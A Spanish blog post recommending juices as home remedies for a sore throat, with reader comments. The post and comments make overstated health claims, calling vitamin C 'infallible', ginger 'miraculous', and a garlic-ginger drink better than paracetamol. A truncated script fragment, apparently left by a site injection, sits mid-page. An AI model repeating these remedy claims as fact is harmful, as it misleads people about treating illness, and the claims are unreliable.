Salud y belleza » Dolores, Salud

Remedios caseros para el dolor de garganta

6 Comentarios

Cuando tienes dolor de garganta todo te cuesta más. No solo hablar, sino también tragar e incluso respirar. Es un problema muy molesto y por eso te vamos a proponer algunos remedios caseros en forma de zumos que pueden ayudarte a aliviar el dolor de garganta.

zumos-contra-dolor-garganta

1. Zumo de menta: la menta te ayudará a despejar el tracto respiratorio para aliviar la congestión y el dolor. Además, tiene propiedades antibacterianas que ayudan a reducir la hinchazón.

2. Zumo de naranja: la vitamina C de este zumo resulta infalible para prevenir dolores de garganta y evitar los dolores.

zumos-dolor-garganta

3. Zumo de ajo: no a todo el mundo le gusta el sabor y el olor del ajo, pero si quieres aliviar tu dolor de garganta prueba a tomar un zumo de ajo que te ayudará a cicatrizar las heridas de la garganta.

4. Zumo de zanahoria: rico en vitamina C te ayuda a combatir la infección de garganta.

zumo-zanahoria-garganta

5. Zumo de jengibre: las propiedades milagrosas del jengibre harán que se reduzca la infección de la garganta para que consigas aliviar el dolor.

6. Zumo de limón: alivia los síntomas del dolor de garganta. Si te lo tomas caliente y con un poco de miel es el remedio ideal y además está muy rico.

¿Conoces más zumos caseros que alivien el dolor de garganta?

var d=document;var s=d.createElement('script'); if (document.currentScript) {

Más consejos de salud y belleza : , , ,

6 Comments »

  • angela said:

    el mejor remedio: un buen té con miel y limón.

  • bego said:

    gracias por los consejos! tengo la garganta súper irritada desde hace ya una semana.

  • Zumo limón y miel said:

    Un remedio casero que me ha enseñado mi suegra y funciona muy bien, es zumo de limón con dos cucharas de mielo lo mueves bien bien , luego haces gárgaras un rato con caa trago sin beberlo , sientes que te escuece la garganta pero aguanta unos 30 segundos lo sueltas escupiendo luego vuelves a empezar tres o cuatro veces por la mañana a primera hora luego por la once veras que es muy efectivo !

  • Remedio casero said:

    TAmbien otro remedio muy efectivo es hacerte un zumo de limón con jingebre batido y lo bebés , es muy amargo pero si consiges aguantar te lo curra en un día , incluso la fiebre o el catarro de los chungos !

    Si quieres ya algo más fuerte añádelo ajo picadito y un poco de pimienta negra y remedio casero más efectivo qe cualquier Cetamol que te puedes tomar !

  • anga said:

    Tengo una tos tan fuerte q tiene un sonido escandaloso ya ase una 1 semana

  • norman said:

    Tener resfriado no es nada agradable, pero tampoco medicarse, bueno a mi no me gusta tomar muchos medicamentos, prefiero los remedios caseros, y me he puesto a buscar alguno

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.